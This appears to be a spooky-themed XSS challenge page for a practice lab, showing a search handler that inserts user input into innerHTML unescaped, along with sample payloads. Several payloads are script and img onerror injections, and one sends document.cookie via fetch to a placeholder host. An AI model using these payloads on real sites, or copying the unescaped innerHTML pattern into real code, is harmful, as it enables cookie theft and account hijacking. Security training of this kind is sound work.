Cursed Code Block


searchInput.addEventListener('input', function () {
    const query = searchInput.value;
    if (query.trim() !== "") {
        const filteredArticles = filterArticles(query);
        searchResultsHeading.innerHTML = `Results for: "${query}"`;
        searchResultsHeading.style.display = 'block';
        renderArticles(filteredArticles);
    } else {
        searchResultsHeading.style.display = 'none';
        renderArticles(articles);
    }
});

Spooky Documentation

Challenge Objective

Your objective is to identify and the XSS vulnerability lurking in the shadows of the search feature and pop an alert box.

Application Structure

The application consists of the following haunted components:

Search Feature: This is where the cursed XSS vulnerability resides. It accepts user input and displays search results based on the query provided.
Articles Section: This section contains various ghostly articles that the search feature filters through based on the user's input.
Cursed Code Block: This section of the application displays the actual code responsible for rendering search results, allowing you to identify potential security flaws.

Example Payloads

Below are a few spooky payloads to get you started:

Basic XSS Payload:

<script>alert('Boo!');</script>

<script>fetch('[host]')</script>

More Diabolical Payload:

<img src=x onerror="alert('Boo!')">

<img src=x onerror="fetch('[HOST]' + document.cookie)" />

Additional Tips

Pay attention to the haunted HTML and JavaScript code. The context in which your payload is executed will determine its effectiveness.
Experiment with different sinister payloads to see how the application responds. Some might be blocked by ancient wards, while others may slip through.
Use developer tools to test and debug your evil payloads.

Good luck, and beware the curse of broken code!